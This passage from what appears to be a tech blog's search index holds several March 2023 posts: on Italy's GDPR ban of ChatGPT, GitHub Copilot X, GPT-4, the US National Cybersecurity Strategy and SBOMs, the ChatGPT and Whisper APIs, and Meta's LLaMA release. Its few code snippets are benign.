sanitize_for_ai(user_message: str, user_data: dict) -\u0026gt; str: sanitized = user_message for field in [\u0026#39;email\u0026#39;, \u0026#39;phone\u0026#39;, \u0026#39;name\u0026#39;, \u0026#39;address\u0026#39;]: if user_data.get(field): sanitized = sanitized.replace( user_data[field], f\u0026#39;[{field.upper()}]\u0026#39; ) return sanitized Simple? Yes. Foolproof? No. But it\u0026rsquo;s a starting point that demonstrates good faith effort at data minimization.\nThe Bigger Picture: Regulation Is Catching Up # This ban is happening against the backdrop of the EU AI Act, which is working its way through legislative process. That regulation will create a comprehensive framework for AI governance in Europe, including requirements for transparency, risk assessment, and human oversight. The compliance requirements are becoming concrete as regulators set deadlines. The ChatGPT ban is a preview of the enforcement posture we can expect.\nThe US is taking a different approach — the National Cybersecurity Strategy I wrote about recently focuses more on liability than prescriptive regulation — but the direction is the same. Governments worldwide are recognizing that AI systems need guardrails, and they\u0026rsquo;re willing to enforce them.\nMy Take # I think Italy\u0026rsquo;s action is blunt but not unreasonable. The specific concerns about training data consent, age verification, and data accuracy are legitimate under existing law. OpenAI has 20 days to respond with remediation measures, and I expect they will — adding age verification, improving privacy notices, and possibly offering data deletion mechanisms.\nBut the deeper issue won\u0026rsquo;t be resolved by a few UI changes. The fundamental architecture of large language models — trained on massive, poorly documented datasets, generating probabilistic outputs that can\u0026rsquo;t be fully controlled — sits uncomfortably within a regulatory framework designed for traditional data processing.\nAs developers, we need to build with this tension in mind. Don\u0026rsquo;t assume that because an AI API is available, it\u0026rsquo;s compliant in every jurisdiction. Don\u0026rsquo;t assume that your AI provider handles all regulatory obligations on your behalf. And don\u0026rsquo;t assume this is a European problem that doesn\u0026rsquo;t affect you — similar regulatory movements are underway globally.\nBuild your AI integrations with privacy by design. It\u0026rsquo;s not just good ethics — increasingly, it\u0026rsquo;s the law.\nThis post is part of my Security in Practice series, examining the intersection of security, privacy, and modern software development.\n","date":"30 March 2023","externalUrl":null,"permalink":"/posts/230330-italy-bans-chatgpt-gdpr-ai-collision/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Italy’s data protection authority blocks ChatGPT over GDPR concerns, raising questions every company building with AI needs to answer.","title":"Italy Bans ChatGPT — When GDPR and AI Collide","type":"posts"},{"content":"Yesterday, GitHub unveiled Copilot X, and it\u0026rsquo;s the most ambitious vision for AI-assisted development I\u0026rsquo;ve seen from any company. Not just better code completion — we\u0026rsquo;re talking chat in your IDE, AI-generated pull request descriptions, automated test generation, voice coding, and personalized documentation answers. All backed by GPT-4.\nIf you thought Copilot was just a fancy autocomplete, GitHub is making it clear: they see AI as a layer that touches every part of the development workflow. And having spent the morning going through the announcements, I think they might actually pull it off.\nBeyond Code Completion # The original Copilot, which I\u0026rsquo;ve been using since its general availability last June, is a code completion tool. You type, it suggests. Useful, sometimes magical, occasionally hilariously wrong. But fundamentally it\u0026rsquo;s a single-interaction pattern: you write context, it predicts what comes next.\nCopilot X expands this into multiple interaction patterns:\nCopilot Chat: A ChatGPT-style interface embedded directly in VS Code and the JetBrains IDEs. You can ask it to explain code, suggest refactors, find bugs, or generate unit tests. Unlike going to ChatGPT in a browser, the chat has your project context — it can see the file you\u0026rsquo;re working on, your open tabs, and potentially your broader codebase.\nCopilot for Pull Requests: This is the feature that caught my attention most. It can automatically generate PR descriptions based on the diff, and more importantly, it can suggest missing tests and flag potential issues before a human reviewer even looks at the code. GitHub is also working on AI-generated review comments.\nCopilot for Docs: Ask natural language questions about a library\u0026rsquo;s documentation and get answers synthesized from the actual docs. GitHub is starting with their own documentation, React, Azure, and MDN. For developers who spend half their day searching Stack Overflow and reading docs, this could be genuinely transformative.\nCopilot Voice: Write code using voice commands. Early days, but the accessibility implications are significant.\nThe GPT-4 Upgrade # The move from Codex (the GPT-3 variant that powered the original Copilot) to GPT-4 is significant. Based on my own testing of GPT-4 over the past week, the improvement in code reasoning is substantial. It understands multi-file context better, handles complex logic more reliably, and produces fewer subtle bugs.\nFor Copilot specifically, this means:\nSuggestions that account for broader context, not just the current function Better understanding of intent when variable names and comments are vague More reliable generation of boilerplate-heavy patterns (API handlers, database models, test fixtures) Improved handling of less common languages and frameworks The real test will be whether these improvements survive the move from the demo environment to production use at scale. OpenAI\u0026rsquo;s API has had reliability issues, and Copilot\u0026rsquo;s real-time completion model requires consistent low-latency responses. If there\u0026rsquo;s a noticeable delay between typing and seeing suggestions, the experience degrades quickly.\nWhat This Means for Development Teams # I\u0026rsquo;ve been managing development teams for over two decades, and the workflow implications here are broader than just individual productivity. Consider:\nCode review processes need to adapt. If Copilot is generating PR descriptions and flagging issues, what\u0026rsquo;s the human reviewer\u0026rsquo;s role? I\u0026rsquo;d argue it becomes more important, not less — you\u0026rsquo;re reviewing the AI\u0026rsquo;s suggestions alongside the code, and you need to be alert to cases where the AI\u0026rsquo;s summary doesn\u0026rsquo;t match what the code actually does.\nOnboarding gets easier. New team members ramping up on a codebase can use Copilot Chat to ask questions about the code itself. \u0026ldquo;What does this service do?\u0026rdquo; \u0026ldquo;Why is this pattern used here?\u0026rdquo; Instead of interrupting senior engineers, they can get contextual answers from the AI. The senior engineers still need to validate those answers, but it reduces the interrupt-driven cost of knowledge transfer.\nDocumentation debt becomes more visible. When Copilot for Docs can\u0026rsquo;t answer a question about your project, it\u0026rsquo;s because your documentation is missing or unclear. This creates a natural feedback loop that makes documentation gaps more apparent.\nTesting practices could improve. If AI-suggested tests become part of the PR workflow, teams that currently under-test might find themselves writing more tests — not because of discipline, but because the suggestion is right there and it takes less effort to accept it than to dismiss it.\nThe Vendor Lock-In Conversation # Let\u0026rsquo;s be real about what GitHub is doing here. They\u0026rsquo;re building a deeply integrated AI layer that works best within the GitHub ecosystem — VS Code, GitHub repos, GitHub Actions, GitHub Docs. If you\u0026rsquo;re already all-in on GitHub, this is convenient. If you\u0026rsquo;re not, it creates a gravitational pull that\u0026rsquo;s hard to resist.\nThe competitive landscape is still forming. JetBrains has its own AI assistant in development. Amazon has CodeWhisperer. Sourcegraph has Cody. Replit is building AI-native development from the ground up. But GitHub\u0026rsquo;s advantage is distribution — they\u0026rsquo;re where the code already lives for millions of developers.\nFor teams that are cautious about vendor concentration, this is worth a deliberate conversation. The productivity benefits of deep integration are real, but so is the risk of building your entire workflow around a single vendor\u0026rsquo;s AI capabilities.\nMy Take # I\u0026rsquo;ve been skeptical about the \u0026ldquo;AI will replace developers\u0026rdquo; narrative, and nothing in the Copilot X announcement changes that. These are tools that amplify developer capability, not replace it. The developer who uses Copilot X effectively will outperform the developer who doesn\u0026rsquo;t, just like the developer who mastered their IDE outperformed the one who didn\u0026rsquo;t.\nWhat excites me most is Copilot for Pull Requests. Code review is one of the highest-leverage activities in software development, and it\u0026rsquo;s also one of the most inconsistent. If AI can handle the mechanical aspects — verifying test coverage, checking for common patterns, generating clear descriptions — human reviewers can focus on the things AI still struggles with: architectural judgment, business logic validation, and mentoring.\nWhat concerns me is the pace. GitHub is announcing features faster than most organizations can evaluate them. The pressure to adopt will be real, and I\u0026rsquo;d encourage teams to be intentional about which features they enable and how they integrate them into existing workflows. Not every AI feature is appropriate for every team.\nStart with Copilot Chat if you\u0026rsquo;re already a Copilot user. It\u0026rsquo;s the most natural extension of the existing experience. Evaluate PR features carefully in a trial period before making them standard. And keep talking to your team about when AI suggestions are helpful and when they\u0026rsquo;re noise.\nThis post is part of my Developer Landscape series, covering the tools and trends shaping modern software development.\n","date":"23 March 2023","externalUrl":null,"permalink":"/posts/230323-github-copilot-x-ai-powered-developer-experience/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub announces Copilot X with GPT-4 integration, chat, voice, pull request summaries, and docs — here’s what developers should actually expect.","title":"GitHub Copilot X — The AI-Powered Developer Experience Takes Shape","type":"posts"},{"content":"Two days ago, OpenAI released GPT-4, and after spending the last 48 hours putting it through its paces, I can say with confidence: this is a meaningful leap over GPT-3.5. Not the \u0026ldquo;artificial general intelligence\u0026rdquo; some are breathlessly claiming, but a substantially more capable, more reliable, and more nuanced model that will meaningfully change what\u0026rsquo;s possible for developers.\nI wrote about the ChatGPT API release just two weeks ago, and already that feels like a warm-up act. GPT-4 isn\u0026rsquo;t just incrementally better — it\u0026rsquo;s qualitatively different in ways that matter for real-world applications. This builds on the foundation of ChatGPT\u0026rsquo;s explosive growth and represents the natural evolution of capabilities we\u0026rsquo;d begun exploring with early GPT-3 deployments.\nWhat\u0026rsquo;s Actually New # The headline features are multimodal input (text and images, though the image capability isn\u0026rsquo;t in the API yet) and dramatically improved reasoning. But the improvements that matter most for developers are more subtle:\nLonger context window: GPT-4 comes in two variants — an 8K token context and a 32K token context. The 32K variant can process roughly 50 pages of text in a single prompt. This fundamentally changes what you can do with in-context learning. Instead of carefully summarizing documentation to fit the context, you can often just… include it.\nImproved instruction following: GPT-3.5 had a tendency to drift off-task, especially with complex multi-step instructions. GPT-4 is noticeably more disciplined. When I give it a system prompt that says \u0026ldquo;respond only in JSON format,\u0026rdquo; it actually does — consistently. This reliability is critical for production applications where you\u0026rsquo;re parsing AI output programmatically.\nBetter reasoning about code: I\u0026rsquo;ve been testing it on code review, bug identification, and architectural analysis. The results are striking. It catches edge cases that GPT-3.5 missed entirely. It can reason about race conditions, identify security vulnerabilities in authentication flows, and explain complex algorithms with genuine clarity.\nOpenAI\u0026rsquo;s own benchmarks show GPT-4 passing the Uniform Bar Exam in the 90th percentile (GPT-3.5 was in the 10th). Whether bar exam performance translates to practical utility is debatable, but the magnitude of improvement is not.\nThe Developer Experience # Getting access requires either a ChatGPT Plus subscription ($20/month for the chat interface) or API access through the waitlist. API pricing is significantly higher than gpt-3.5-turbo: $0.03 per 1K prompt tokens and $0.06 per 1K completion tokens for the 8K model. That\u0026rsquo;s 15-30x more expensive than the ChatGPT API. As we saw with GPT-3 API accessibility, pricing plays a critical role in determining adoption and architectural patterns.\nThis pricing creates an interesting architectural decision. For many applications, the right approach will be a tiered system: use gpt-3.5-turbo for routine tasks and route complex queries to GPT-4. The cost difference is large enough that you can\u0026rsquo;t just swap models blindly in a high-volume application.\ndef get_model_for_task(task_complexity: str) -\u0026gt; str: if task_complexity == \u0026#34;complex\u0026#34;: return \u0026#34;gpt-4\u0026#34; return \u0026#34;gpt-3.5-turbo\u0026#34; Simplistic, obviously, but the principle matters. Intelligent routing between models is going to become a standard architectural pattern. Think of it like using different database tiers — you don\u0026rsquo;t query your analytics warehouse for a simple key lookup.\nWhere GPT-4 Genuinely Excels # After extensive testing, here\u0026rsquo;s where I see the most impactful improvements for software development workflows:\nComplex code generation: Ask it to implement a rate limiter with token bucket algorithm, sliding window fallback, and distributed state via Redis. GPT-3.5 would give you a plausible but often buggy implementation. GPT-4 produces code that\u0026rsquo;s closer to production-ready, with proper error handling and edge case management.\nTechnical document analysis: Feed it an RFC or a long technical specification and ask it to summarize the key changes, identify potential implementation challenges, or compare it to a previous version. The 32K context window makes this practical in a way it wasn\u0026rsquo;t before.\nSystem design reasoning: Describe an architecture and ask it to identify single points of failure, suggest improvements, or evaluate trade-offs. GPT-4\u0026rsquo;s responses here feel qualitatively different — it considers failure modes, discusses consistency/availability trade-offs, and asks clarifying questions about requirements.\nCode review: Point it at a pull request diff and ask for a review. It catches logical errors, suggests performance improvements, and identifies patterns that violate SOLID principles. It\u0026rsquo;s not replacing a senior engineer\u0026rsquo;s review, but it\u0026rsquo;s a useful first pass.\nThe Limitations You Need to Know # GPT-4 is impressive, but it\u0026rsquo;s not infallible. A few important limitations:\nIt still hallucinates. Less frequently than GPT-3.5, and the hallucinations are often more subtle, which in some ways makes them more dangerous. It will confidently cite API methods that don\u0026rsquo;t exist or describe library features that were never implemented. Always verify.\nThe knowledge cutoff is September 2021. Same as GPT-3.5. It doesn\u0026rsquo;t know about libraries released after that date, recent API changes, or current best practices that have evolved since then. This is a significant limitation for a tool marketed toward developers.\nSpeed and cost. GPT-4 is noticeably slower than GPT-3.5, and the cost difference means you need to be intentional about when you use it. For time-sensitive applications, the latency might be a dealbreaker.\nIt\u0026rsquo;s not open. OpenAI has not released a technical paper with model details, only a system card. We don\u0026rsquo;t know the parameter count, training data, or architectural specifics. For those of us who value understanding our tools, this opacity is frustrating.\nMy Take # I\u0026rsquo;ve been cautiously skeptical about the AI hype cycle, and I stand by that caution. GPT-4 is not AGI. It\u0026rsquo;s not going to replace software engineers. It\u0026rsquo;s not going to solve alignment. It is, however, the most useful AI tool I\u0026rsquo;ve had access to in my career. The journey from the initial GPT-3 language model through ChatGPT to GPT-4 shows the accelerating pace of capability improvements in the AI space.\nThe practical gap between GPT-3.5 and GPT-4 is large enough to unlock use cases that were previously unreliable. Code review assistance, documentation generation, complex query answering, architectural analysis — these move from \u0026ldquo;sometimes useful\u0026rdquo; to \u0026ldquo;reliably valuable.\u0026rdquo;\nMy recommendation: get on the API waitlist if you haven\u0026rsquo;t already. Start with the use cases where accuracy matters most and where you have human review in the loop. Build your applications with model-agnostic abstractions so you can swap between GPT-3.5 and GPT-4 based on task requirements and budget constraints.\nThis is a tool worth integrating into your workflow. Just remember it\u0026rsquo;s a tool, not a colleague — it doesn\u0026rsquo;t understand, it predicts. Keep your critical thinking engaged.\nThis post is part of my AI in Development series, where I track the real-world impact of AI tools on software engineering.\n","date":"16 March 2023","externalUrl":null,"permalink":"/posts/230316-gpt4-lands-and-raises-the-bar/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI releases GPT-4 with multimodal capabilities and dramatically improved reasoning — here’s what it means for developers.","title":"GPT-4 Lands — And It Raises the Bar Significantly","type":"posts"},{"content":"Last week, the Biden administration released its National Cybersecurity Strategy, and buried in the policy language is a tectonic shift that should have every software vendor, open-source maintainer, and enterprise development team sitting up straight. The document explicitly calls for shifting cybersecurity liability from end users to the companies that build and maintain software.\nIf you\u0026rsquo;re a developer reading this and thinking \u0026ldquo;that\u0026rsquo;s a policy thing, not my problem\u0026rdquo; — I\u0026rsquo;d urge you to reconsider. This is the clearest signal yet that the era of shipping software with known vulnerabilities and hiding behind EULAs is ending.\nThe Core Shift: You Built It, You Own It # The strategy is organized around five pillars, but Pillar 3 — \u0026ldquo;Shape Market Forces to Drive Security and Resilience\u0026rdquo; — is the one that will keep software executives up at night. The key language: the administration wants to \u0026ldquo;shift liability onto those entities that fail to take reasonable precautions to secure their software.\u0026rdquo;\nThis isn\u0026rsquo;t entirely new thinking. The EU\u0026rsquo;s Cyber Resilience Act has been moving in a similar direction. But the US putting this in a top-level strategic document signals that legislation will follow. The question isn\u0026rsquo;t whether software liability laws are coming, but when and how broadly they\u0026rsquo;ll be applied.\nFor those of us in the trenches, this means several things. First, \u0026ldquo;we\u0026rsquo;ll fix it in the next sprint\u0026rdquo; is going to carry legal weight it never had before. Second, software bills of materials (SBOMs) are moving from \u0026ldquo;nice to have\u0026rdquo; to \u0026ldquo;legally required.\u0026rdquo; Third, the security practices you implement today are building (or failing to build) your compliance posture for regulations that are almost certainly coming within the next few years.\nWhat This Means for Open Source # The strategy acknowledges that open-source software requires special consideration, and this is where things get genuinely complicated. The document suggests that liability should fall on the commercial entities that build products using open-source components, not on the volunteer maintainers of those components.\nThat sounds reasonable in theory. In practice, the boundary between \u0026ldquo;commercial use\u0026rdquo; and \u0026ldquo;community contribution\u0026rdquo; is blurry at best. A company that maintains an open-source project as part of its business model — think Elastic, HashiCorp, or Red Hat — occupies a grey zone that policy makers will need to define more precisely.\nI\u0026rsquo;m cautiously optimistic about this approach. The Log4j incident in late 2021 showed us what happens when critical infrastructure depends on under-resourced open-source projects. Placing liability on the commercial consumers of open source creates a financial incentive to actually fund and support the projects they depend on. Whether that incentive translates into meaningful investment remains to be seen.\nFor open-source maintainers: this is a good time to make sure your project has clear licensing, contribution guidelines, and — critically — documented security practices. Even if you\u0026rsquo;re not directly liable, being part of a supply chain that\u0026rsquo;s under regulatory scrutiny means more eyeballs on your processes.\nThe SBOM Imperative # If you\u0026rsquo;re not already generating Software Bills of Materials for your projects, start now. The strategy builds on Executive Order 14028 from 2021, which already mandated SBOMs for software sold to the federal government. The new strategy expands this thinking to the broader market.\nTools like Syft, Trivy, and CycloneDX make SBOM generation straightforward. If you\u0026rsquo;re running a CI/CD pipeline (and in 2023, you should be), adding SBOM generation is a half-day task at most. Here\u0026rsquo;s a basic example with Syft in a GitHub Actions workflow:\n- name: Generate SBOM uses: anchore/sbom-action@v0 with: image: myapp:${{ github.sha }} format: cyclonedx-json output-file: sbom.json The harder part isn\u0026rsquo;t generating the SBOM — it\u0026rsquo;s acting on it. You need processes for tracking vulnerabilities in your dependency tree, policies for how quickly you patch, and documentation showing you\u0026rsquo;ve taken \u0026ldquo;reasonable precautions.\u0026rdquo; That last phrase is going to be litigated extensively.\nSecure by Design, Not Secure by Afterthought # The strategy repeatedly emphasizes \u0026ldquo;secure by design\u0026rdquo; and \u0026ldquo;secure by default.\u0026rdquo; These aren\u0026rsquo;t new concepts — we\u0026rsquo;ve been talking about shifting security left for a decade. But having them enshrined in national strategy adds institutional weight.\nPractically, this means:\nDefault configurations should be secure. If your application ships with debug mode enabled, default passwords, or permissive CORS policies, that\u0026rsquo;s a liability. Memory-safe languages get a boost. The strategy explicitly mentions reducing memory safety vulnerabilities. If you\u0026rsquo;re starting a new systems project and choosing between C++ and Rust, the regulatory environment just added another point in Rust\u0026rsquo;s column. Vulnerability disclosure programs are becoming mandatory, not optional. If you don\u0026rsquo;t have a way for researchers to report security issues, you\u0026rsquo;re already behind. My Take # I\u0026rsquo;ve lived through enough security incidents to know that voluntary compliance doesn\u0026rsquo;t work at scale. Companies that prioritize security do so because of culture and leadership, not because of guidelines. For everyone else, regulation is the only lever that moves the needle.\nIs there a risk of overreach? Absolutely. Poorly drafted legislation could punish small vendors disproportionately, create compliance theater that doesn\u0026rsquo;t improve actual security, or chill open-source contribution. The details matter enormously, and I hope the eventual legislation benefits from genuine technical input rather than just lobbyist influence.\nBut the direction is right. As someone who has spent decades watching organizations treat security as someone else\u0026rsquo;s problem, seeing it elevated to a national strategic priority — with real liability implications — feels overdue. We build the software that runs the world\u0026rsquo;s infrastructure. It\u0026rsquo;s not unreasonable to ask that we take responsibility for securing it.\nStart with the basics: generate SBOMs, automate dependency scanning, document your security practices, and make sure your team understands that \u0026ldquo;secure by default\u0026rdquo; isn\u0026rsquo;t a slogan anymore. It\u0026rsquo;s becoming the law.\nThis post is part of my Security in Practice series, covering the evolving intersection of security, policy, and software development.\n","date":"9 March 2023","externalUrl":null,"permalink":"/posts/230309-us-national-cybersecurity-strategy-2023/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Biden administration’s new cybersecurity strategy shifts liability toward software vendors, and developers need to pay attention.","title":"The US National Cybersecurity Strategy — Software Liability Is Coming","type":"posts"},{"content":"Yesterday, OpenAI flipped the switch on two APIs that are about to reshape how we build software: the ChatGPT API (powered by gpt-3.5-turbo) and the Whisper API for speech-to-text. The pricing? $0.002 per 1K tokens for ChatGPT — that\u0026rsquo;s roughly 10x cheaper than the existing text-davinci-003 model. This comes just months after ChatGPT\u0026rsquo;s explosive growth and the broader industry realization of what ChatGPT meant. If you haven\u0026rsquo;t already started prototyping, you\u0026rsquo;re behind.\nI\u0026rsquo;ve spent the last 24 hours playing with both endpoints, and I can tell you: this is not incremental. This is the moment AI integration goes from \u0026ldquo;interesting experiment\u0026rdquo; to \u0026ldquo;obvious default\u0026rdquo; for a huge range of applications.\nThe API That Changes the Economics # Let\u0026rsquo;s talk numbers. At $0.002 per 1K tokens, a typical back-and-forth conversation of around 1,000 tokens costs you a fraction of a cent. For context, the GPT-3 davinci model was $0.02 per 1K tokens. That\u0026rsquo;s a 90% price drop with arguably better conversational quality.\nThe new gpt-3.5-turbo model uses a chat-oriented format — you send a list of messages with roles (system, user, assistant) rather than a single prompt string. This is a smart design choice. It makes conversation history explicit and gives developers cleaner control over the AI\u0026rsquo;s behavior through the system message.\n{ \u0026#34;model\u0026#34;: \u0026#34;gpt-3.5-turbo\u0026#34;, \u0026#34;messages\u0026#34;: [ {\u0026#34;role\u0026#34;: \u0026#34;system\u0026#34;, \u0026#34;content\u0026#34;: \u0026#34;You are a helpful assistant.\u0026#34;}, {\u0026#34;role\u0026#34;: \u0026#34;user\u0026#34;, \u0026#34;content\u0026#34;: \u0026#34;Explain Docker networking in simple terms.\u0026#34;} ] } For those of us who\u0026rsquo;ve been building with the completion API, the migration is straightforward. But the chat format is genuinely better for most real-world use cases. You can set persistent instructions in the system role and maintain context across turns without the clunky prompt engineering gymnastics we\u0026rsquo;ve been doing.\nWhisper: The Quietly Revolutionary Sibling # The Whisper API deserves more attention than it\u0026rsquo;s getting. OpenAI open-sourced the Whisper model last September, and I\u0026rsquo;ve been running it locally for transcription tasks since then. It\u0026rsquo;s excellent — but running it requires a decent GPU and some infrastructure overhead.\nNow you can hit an API endpoint at $0.006 per minute of audio. That\u0026rsquo;s absurdly cheap for production-grade speech-to-text. I\u0026rsquo;ve tested it against Google Cloud Speech-to-Text and AWS Transcribe, and Whisper holds its own on accuracy while being significantly simpler to integrate. One endpoint, one file upload, clean JSON back.\nFor teams building anything voice-related — customer support tools, meeting transcription, accessibility features — this just eliminated weeks of infrastructure work. No model hosting, no GPU provisioning, no batching logic. Just an HTTP call.\nWhat I\u0026rsquo;m Already Seeing in the Wild # Within hours of the announcement, my timeline was flooded with prototypes. Chatbots being wired into Slack workspaces. Customer support widgets. Code review assistants. Translation layers. The speed at which developers are moving on this is remarkable, even by modern standards.\nA few patterns are emerging that I think will define the first wave:\nThin wrapper apps: The simplest integration — take an existing product, add a chat interface powered by gpt-3.5-turbo, ship it. We\u0026rsquo;ll see thousands of these. Most won\u0026rsquo;t survive, but some will find genuine product-market fit.\nDomain-specific assistants: This is where the system message shines. You can create a \u0026ldquo;database expert\u0026rdquo; or \u0026ldquo;security auditor\u0026rdquo; persona that stays in character and provides genuinely useful domain advice. Combined with retrieval-augmented generation (stuffing relevant documentation into the context), these can be remarkably effective.\nWorkflow automation: Chaining API calls together — summarize this email, draft a response, extract action items, create tickets. The cost is low enough that you can run multi-step AI pipelines on routine business processes without blowing your budget.\nThe Concerns That Keep Me Grounded # I\u0026rsquo;ve been in this industry long enough to recognize a gold rush when I see one. And gold rushes produce both genuine innovation and spectacular flameouts. This reminds me of the energy around GPT-3\u0026rsquo;s initial release — another moment where suddenly accessible AI capabilities changed what developers could build. A few things worry me:\nLatency: The API isn\u0026rsquo;t instant. For real-time applications, you\u0026rsquo;re looking at noticeable delays. Streaming helps (and OpenAI supports it), but it\u0026rsquo;s not the same as a snappy local computation. Think carefully about where in your UX you place AI-generated responses.\nReliability at scale: OpenAI has had availability issues before. If you\u0026rsquo;re building a core product feature on this API, you need to think about fallbacks, caching, and graceful degradation. Don\u0026rsquo;t make your checkout flow dependent on a third-party AI call.\nThe \u0026ldquo;good enough\u0026rdquo; trap: Just because the model can generate plausible text doesn\u0026rsquo;t mean it\u0026rsquo;s correct. I\u0026rsquo;ve already seen people building medical Q\u0026amp;A tools and financial advisors. The liability implications of deploying unvalidated AI responses in high-stakes domains are significant and largely untested.\nMy Take # I\u0026rsquo;ve been building software since the early \u0026rsquo;90s, and I\u0026rsquo;ve seen my share of \u0026ldquo;this changes everything\u0026rdquo; moments. Most of them didn\u0026rsquo;t. But this one has a quality that the others lacked: immediate practical utility at a price point that removes the need for justification.\nYou don\u0026rsquo;t need to convince your CTO to allocate GPU budget. You don\u0026rsquo;t need a machine learning team. You need an API key and a weekend. That accessibility is what makes this genuinely transformative.\nMy advice? Start small. Pick one tedious workflow in your organization — documentation generation, log analysis, test data creation — and build a prototype this week. The API is stable enough, cheap enough, and capable enough to deliver real value right now. Just don\u0026rsquo;t forget to validate the outputs. The model is confident, articulate, and occasionally dead wrong.\nThe AI integration wave isn\u0026rsquo;t coming. As of yesterday, it\u0026rsquo;s here.\nThis post is part of my ongoing AI in Development series, tracking how AI tools are reshaping software engineering in real time.\n","date":"2 March 2023","externalUrl":null,"permalink":"/posts/230302-chatgpt-api-opens-floodgates/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI releases the ChatGPT and Whisper APIs at a fraction of expected cost, and every developer I know is scrambling to integrate.","title":"ChatGPT API Goes Live — And the Floodgates Are Open","type":"posts"},{"content":"Meta dropped a bombshell this week with the release of LLaMA (Large Language Model Meta AI), a collection of foundation language models ranging from 7 billion to 65 billion parameters. The models are being made available to researchers under a non-commercial license, and the implications for the open-source AI ecosystem are enormous. While OpenAI and Google keep their most powerful models behind API paywalls, Meta just handed the research community the keys to a very capable car.\nWhat Makes LLaMA Different # GPT-3 has 175 billion parameters, and there are rumors of much larger models in development at various labs. What makes LLaMA significant is the combination of strong performance at smaller sizes with open access for researchers.\nThe research paper shows that LLaMA-13B outperforms GPT-3 (175B) on most benchmarks despite being over 10x smaller. LLaMA-65B is competitive with Google\u0026rsquo;s PaLM (540B) and Chinchilla (70B). The key insight is that training smaller models on more data — LLaMA was trained on 1.4 trillion tokens from publicly available datasets — produces better results than simply scaling up model size.\nThis matters practically because smaller models are dramatically cheaper to run. Inference on a 13-billion-parameter model can be done on a single high-end GPU. A 65-billion-parameter model needs a multi-GPU setup but is still within reach of well-funded research labs and even some individual researchers. Compare that to the infrastructure needed to serve a 175B+ parameter model, and you start to see why the \u0026ldquo;train longer, not bigger\u0026rdquo; approach is so significant.\nThe Open-Source AI Ecosystem # The release comes at a critical moment in the AI landscape. The most capable language models — GPT-3.5/ChatGPT, GPT-4 (if rumors are true), Google\u0026rsquo;s PaLM — are controlled by a handful of companies. Access is mediated through APIs with usage costs, rate limits, and terms of service that can change at any time. Building a business on someone else\u0026rsquo;s API is always risky; building a business on an AI API where the provider might decide your use case violates their acceptable use policy is riskier still.\nOpen-source alternatives have existed — EleutherAI\u0026rsquo;s GPT-NeoX, BigScience\u0026rsquo;s BLOOM — but they\u0026rsquo;ve generally lagged behind commercial models in capability. LLaMA significantly closes that gap. A 65B model that\u0026rsquo;s competitive with the best commercial offerings gives the research community a serious foundation to build on.\nI expect we\u0026rsquo;ll see an explosion of fine-tuned variants within months. Researchers will adapt LLaMA for specific domains — medical, legal, code generation, multilingual tasks — and share those adapted models with the community. The compound effect of thousands of researchers building on a strong foundation model could produce specialized capabilities that no single company could develop internally.\nTechnical Deep Dive # For those interested in the architecture: LLaMA uses a standard transformer decoder architecture with several modifications that have become best practices in the field. These include pre-normalization using RMSNorm (from GPT-3), the SwiGLU activation function (from PaLM), and rotary positional embeddings (RoPE). Nothing revolutionary individually, but the combination with careful training choices produces excellent results.\nThe training data is entirely from publicly available sources: CommonCrawl, C4, GitHub, Wikipedia, Books, ArXiv, and Stack Exchange. No proprietary datasets, no data behind login walls. This matters for reproducibility and for understanding the model\u0026rsquo;s biases and limitations.\nWhat particularly impressed me in the paper is the training efficiency analysis. The authors demonstrate that computational budgets are better spent on training data volume than model size, following the \u0026ldquo;Chinchilla scaling laws\u0026rdquo; from DeepMind\u0026rsquo;s research. Practically, this means that organizations with moderate compute budgets can train highly capable models if they invest in good data curation and training infrastructure.\nImplications for Enterprise AI # Even though LLaMA\u0026rsquo;s license restricts commercial use, the ripple effects will reach enterprise environments quickly. Here\u0026rsquo;s how:\nResearch-to-production pipeline: Researchers will develop techniques, fine-tuning approaches, and architectural improvements using LLaMA that can be applied to other models, including commercially licensed ones. The knowledge transfer is enormous.\nCompetitive pressure on pricing: Every capable open model puts downward pressure on API pricing from OpenAI and others. This dynamic will intensify as open-weight models improve. If a company can get 80% of GPT-3\u0026rsquo;s capability by running an open model on their own infrastructure, the premium for API access needs to be justified by that remaining 20%.\nOn-premises AI becomes feasible: For organizations that can\u0026rsquo;t send data to external APIs — healthcare, finance, defense, government — running capable models on-premises has been impractical because the best models weren\u0026rsquo;t available. LLaMA changes that calculation for research purposes, and the techniques it validates will inform commercial open models.\nTalent development: Having access to state-of-the-art models means universities and independent researchers can train the next generation of AI engineers on real, capable systems rather than toy examples. This expands the talent pool for everyone.\nThe Access Question # Meta\u0026rsquo;s approach is a middle ground between fully open-source and fully proprietary. The models are available to researchers who apply for access, under a license that prohibits commercial use. This has already generated debate in the community — some argue it should be fully permissive, others think even this level of access is irresponsible given potential misuse.\nI land somewhere in the pragmatic middle. Making powerful AI models available to the research community is essential for safety research, bias detection, and developing alignment techniques. You can\u0026rsquo;t fix problems in systems you can\u0026rsquo;t inspect. At the same time, some guardrails on distribution seem reasonable while the field develops better understanding of misuse risks.\nThe reality is that sufficiently motivated actors already have access to capable language models through various means. Restricting access primarily affects legitimate researchers who play by the rules. Meta seems to recognize this — their approach enables research while maintaining some ability to track who\u0026rsquo;s using the models and for what purpose.\nMy Take # This release feels like a turning point. The concentration of AI capabilities in a few commercial entities has been a growing concern, and LLaMA demonstrates that open alternatives can compete at the frontier. The \u0026ldquo;train smaller models on more data\u0026rdquo; insight alone is worth the paper — it means the compute barrier to training capable models is lower than many assumed.\nWhat I\u0026rsquo;m watching for next: how quickly the research community iterates on LLaMA, whether we see fine-tuned variants that match or exceed ChatGPT for specific tasks, and how OpenAI and Google respond to the competitive pressure from below. The AI ecosystem just got a lot more interesting, and honestly, a lot more healthy. Concentration of power in any technology domain is bad for innovation, and LLaMA is a meaningful counterweight.\nIf you\u0026rsquo;re a developer interested in AI, start familiarizing yourself with running and fine-tuning open language models. The tooling around Hugging Face Transformers, PEFT (Parameter-Efficient Fine-Tuning), and related projects is maturing rapidly. The era of \u0026ldquo;AI as someone else\u0026rsquo;s API\u0026rdquo; may be shorter than we thought.\n","date":"23 February 2023","externalUrl":null,"permalink":"/posts/230223-meta-llama-open-source-llm/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta’s release of LLaMA, a family of foundation language models available to researchers, could 